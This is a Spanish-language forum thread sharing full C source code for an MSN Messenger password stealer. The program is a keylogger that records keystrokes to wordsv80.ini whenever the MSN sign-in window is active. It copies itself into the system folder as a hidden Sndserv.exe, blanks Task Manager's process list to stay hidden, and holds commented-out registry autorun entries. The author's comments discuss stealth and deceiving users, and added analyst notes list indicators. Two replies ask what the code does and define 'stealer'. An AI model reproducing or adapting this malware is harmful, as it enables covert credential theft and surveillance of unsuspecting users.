Stealer MSN

Iniciado por ANTRAX, Mayo 22, 2011, 10:00:32 PM



Mayo 22, 2011, 10:00:32 PM Ultima modificación: Febrero 08, 2014, 05:47:50 PM por Expermicid
Código: c
#include <stdlib.h>	
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h> 
#include <string.h>

// all includes should be standard in dev

/*
   Name: KOrUPt(not tellin)
   Author: KOrUPt
   Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
   Date Written: 01/10/06 - 04/10/06
   Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvements you make, thanks.
*/


/*
 * keys: append a text rendering of one virtual-key code to the log file.
 *
 *   key   virtual-key code; compared below against VK_* constants and raw numbers
 *   file  path of the log file; opened in append mode ("a+") and closed again
 *         on every call
 *
 * Analyst notes:
 *  - Every bracketed label below ("[Caps L]", "[Windows key]", "[DIVIDE KEY]", ...)
 *    is a plain string literal, so the set is present both in the compiled
 *    binary and in the log file (the author's comment on the signature line
 *    says as much). The labels are usable as static-string and log-content
 *    signatures.
 *  - The checks are independent ifs, not an else-if chain, so a single key can
 *    produce more than one token in the log.
 */
void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{ // quite alot of source code(not good), so i may change the key output to codes instead

FILE *key_file;

key_file = fopen(file,"a+");

Sleep(10);

// 8 is VK_BACK (backspace); it is logged as "[del]".
if (key==8)

fprintf(key_file,"%s","[del]");

// 13 equals VK_RETURN, so Enter matches here and again at the VK_RETURN check
// below: the log receives "\n" followed by "[ENTER]\n\n".
if (key==13)

fprintf(key_file,"%s","\n");

// 32 equals VK_SPACE, so the space bar logs " " here and "[SPACE]" below.
if (key==32)

fprintf(key_file,"%s"," ");

if (key==VK_CAPITAL)

fprintf(key_file,"%s","[Caps L]");

if (key==VK_TAB)

fprintf(key_file,"%s","[TAB]");

if (key ==VK_CONTROL)

fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)

fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");

if (key ==VK_END)

fprintf(key_file,"%s","[END]");

if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");

if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");

if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");

if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");

if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");

if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");

// VK_NUMLOCK is tested twice in this function; the second test further down
// writes "[NUMLOCK KEY]" as well.
if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");

if (key ==VK_RETURN)

fprintf(key_file,"%s","[ENTER]\n\n");

if (key ==VK_SHIFT)

fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_SPACE)

fprintf(key_file,"%s","[SPACE]");

// Mouse buttons are virtual keys too; the caller in this listing starts its
// scan at code 8, above both button codes.
if (key ==VK_LBUTTON)

fprintf(key_file,"%s","[LM B]");

if (key ==VK_RBUTTON)

fprintf(key_file,"%s","[RM B]");

if (key ==VK_MENU)

fprintf(key_file,"%s","[ALT]");

if (key ==VK_LWIN)

fprintf(key_file,"%s","[Windows key]");

if (key ==VK_ADD)

fprintf(key_file,"%s","[+]");

if (key ==VK_SUBTRACT)

fprintf(key_file,"%s","[-]");

if (key ==VK_DECIMAL)

fprintf(key_file,"%s","[.]");

if (key ==VK_DIVIDE)

fprintf(key_file,"%s","[DIVIDE KEY]");

if (key ==VK_NUMPAD0)

fprintf(key_file,"%s","[NUMPAD 0]");

if (key ==VK_NUMPAD1)

fprintf(key_file,"%s","[NUMPAD 1]");

if (key ==VK_NUMPAD2)

fprintf(key_file,"%s","[NUMPAD 2]");

if (key ==VK_NUMPAD3)

fprintf(key_file,"%s","[NUMPAD 3]");

if (key ==VK_NUMPAD4)

fprintf(key_file,"%s","[NUMPAD 4]");

if (key ==VK_NUMPAD5)

fprintf(key_file,"%s","[NUMPAD 5]");

if (key ==VK_NUMPAD6)

fprintf(key_file,"%s","[NUMPAD 6]");

if (key ==VK_NUMPAD7)

fprintf(key_file,"%s","[NUMPAD 7]");

if (key ==VK_NUMPAD8)

fprintf(key_file,"%s","[NUMPAD 8]");

if (key ==VK_NUMPAD9)

fprintf(key_file,"%s","[NUMPAD 9]");

if (key ==VK_F1)

fprintf(key_file,"%s","[F1 KEY]");

if (key ==VK_F2)

fprintf(key_file,"%s","[F2 KEY]");

if (key ==VK_F3)

fprintf(key_file,"%s","[F3 KEY]");

if (key ==VK_F4)

fprintf(key_file,"%s","[F4 KEY]");

if (key ==VK_F5)

fprintf(key_file,"%s","[F5 KEY]");

if (key ==VK_F6)

fprintf(key_file,"%s","[F6 KEY]");

if (key ==VK_F7)

fprintf(key_file,"%s","[F7 KEY]");

if (key ==VK_F8)

fprintf(key_file,"%s","[F8 KEY]");

if (key ==VK_F9)

fprintf(key_file,"%s","[F9 KEY]");

if (key ==VK_F10)

fprintf(key_file,"%s","[F10 KEY]");

if (key ==VK_F11)

fprintf(key_file,"%s","[F11 KEY]");

if (key ==VK_F12)

fprintf(key_file,"%s","[F12 KEY]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUMLOCK KEY]");

if (key ==VK_SCROLL)

fprintf(key_file,"%s","[SCROLL LOCK]");


/*   // WONT WORK ON WIN 9X


if (key ==VK_OEM_PLUS)

fprintf(key_file,"%s","[+]");

if (key ==VK_OEM_COMMA)

fprintf(key_file,"%s","[,]");

if (key ==VK_OEM_MINUS)

fprintf(key_file,"%s","[-]");

if (key ==VK_OEM_PERIOD)

fprintf(key_file,"%s","[.]");

*/

// 110 is VK_DECIMAL (already logged as "[.]" above); 190 is the main-keyboard
// period key. Both additionally write a bare ".".
if (key ==190 || key==110)

fprintf(key_file,"%s",".");


// Codes 96..105 are VK_NUMPAD0..VK_NUMPAD9. Subtracting 48 turns them into the
// ASCII codes for '0'..'9'.
if (key >=96 && key <= 105){

key = key - 48;

// NOTE(review): the address of the int is passed to %s, so the int's bytes are
// read as a C string. On little-endian x86 that yields the single character
// held in the low byte - confirm for any other target.
fprintf(key_file,"%s",&key);

}

// Top-row digit keys. `key` may have been reassigned by the numpad branch just
// above, in which case it falls inside this range as well.
if (key >=48 && key <= 59)

fprintf(key_file,"%s",&key);



// This outer condition is true for every value of key (no value equals both
// constants at once), so it does not filter anything.
if (key !=VK_LBUTTON || key !=VK_RBUTTON){

// Codes 65..90 are the letter keys A..Z.
if (key >=65 && key <=90){

// A non-zero GetKeyState(VK_CAPITAL) logs the upper-case letter as is;
// otherwise 32 is added to obtain the lower-case ASCII letter.
if (GetKeyState(VK_CAPITAL))

fprintf(key_file,"%s",&key);
else

{

key = key +32;

fprintf(key_file,"%s",&key);



}
}

}

fclose(key_file);



}


// File-scope state shared by the functions below.
// The file and value names built from these buffers (wordsv80.ini, Sndserv.exe)
// are the host-based indicators this listing exposes.
char buffer[300] = "";        // receives the foreground window title in WinMain
HWND currentwin;              // foreground window handle sampled in WinMain
DWORD pid;                    // filled by GetWindowThreadProcessId in WinMain; not read anywhere in this listing
unsigned char reg[2] = "1";   // not referenced anywhere else in this listing
HMODULE modH = GetModuleHandle(0);   // handle of the running executable, passed to GetModuleFileName in WinMain
char dir[255];                // system directory path, later suffixed with "\\Sndserv.exe"
char dir2[MAX_PATH];          // full path of the running executable (source of the self-copy)
char dir3[MAX_PATH];          // shadowed by a local dir3 inside WinMain; this global is not used in the listing
char KeyLogPath[MAX_PATH];   // holds dir path for wordsv80.ini


  // Functions

/*
 * block: EnumChildWindows callback, invoked once per child window of the
 * window that HideProgram looks up.
 *
 *   hwnd    child window currently being enumerated
 *   lParam  unused
 *
 * Returns FALSE (stop enumerating) once the matching child has been handled,
 * TRUE (continue) otherwise.
 *
 * Analyst notes: the match is a child whose text contains "Processes" and whose
 * class name contains "SysListView32". That control receives LVM_DELETEALLITEMS,
 * which empties the list as displayed. Nothing in this function touches the
 * process itself, so only that GUI view is affected. A Task Manager process
 * list that keeps blanking, or a foreign process sending list-view messages to
 * Task Manager, is the observable symptom.
 */
BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
GetClassName(hwnd,classname,249);

   
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{
SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
return FALSE;
}
return TRUE;
}

/*
 * HideProgram: endless loop that, every 5 ms, looks up the top-level window
 * titled "Windows Task Manager" and runs the block() callback over its child
 * windows. It never returns.
 *
 * NOTE(review): the DWORD WINAPI signature resembles a thread start routine,
 * but no CreateThread call or direct call to this function appears in the
 * listing shown - confirm against the full sample before assuming the
 * Task Manager tampering is active.
 */
DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
  for(;;)
{
Sleep(5);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function every 5 milliseconds
}
}



/*
 * WinMain: program entry point. In order, the visible code
 *   1. builds the log path <Windows directory>//wordsv80.ini in KeyLogPath;
 *   2. copies the running executable to <system directory>\Sndserv.exe and
 *      marks the copy hidden + read-only + system;
 *   3. (commented out in this listing) would add autorun values under four
 *      HKLM ...\CurrentVersion keys;
 *   4. loops forever, sampling the foreground window title and, while it
 *      contains the MSN Messenger sign-in caption, polling key state and
 *      passing pressed keys to keys().
 *
 * Returns 0 only through the key-combination exit inside the loop.
 *
 * Analyst notes (indicators taken from this listing): the file names
 * wordsv80.ini and Sndserv.exe; an executable in the system directory carrying
 * the hidden/system/read-only attribute combination; GetAsyncKeyState polled
 * across a range of key codes, gated on a window title match.
 */
int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
{

char i;   // loop counter for the key-code scan below
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
strcat(KeyLogPath,"//wordsv80.ini");   // this is the file that keys are saved to



   // Add to system folder

// dir2 = path of the running executable, dir = system directory.
GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);

strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
CopyFile(dir2,dir,FALSE); //  but dont know how to change the icon pic, lol, will learn how to soon though
// This local dir3 shadows the global of the same name; it is only referenced
// by the commented-out registry code below.
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out



// Add to registry

// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol

// oh well back to the code
// Analyst note: the registry block that follows is commented out, so this
// listing as posted writes no autorun values. The key paths and value names it
// contains remain useful search terms for variants that enable it; each value
// would hold the bare file name "Sndserv.exe".
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);


HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2); //  i dont fully know how this key will react on startup, should be alright lol



HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);

HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);


// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method

  */



  while(1)
{
Sleep(20);   // to save some cpu



// Just in case we need an emergency exit
// Ctrl + Tab + F5 + F8 held together: show an empty message box and return.
   if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
   {
   MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
return 0;
   }

// cannot close program while login box is present
// While the title keeps matching, control returns to this label after each
// logged key, so the exit check above is not reached.
jump:
currentwin =  GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
// Capture is gated on the foreground window title containing this caption.
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
{
// pid is stored but not read anywhere in this listing.
GetWindowThreadProcessId(currentwin,&pid);

for(i=8;i<=190;i++) // activate keyloger
{
// -32767 is 0x8001 as a 16-bit value: key currently down (high bit) and
// pressed since the previous GetAsyncKeyState call (low bit).
if (GetAsyncKeyState(i) == -32767)
{




keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file


  goto jump; // to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}



¿Cuál es la función de esto?   :o :o (¡Pusiste buenos códigos fuente! Gracias)

Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.

Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.
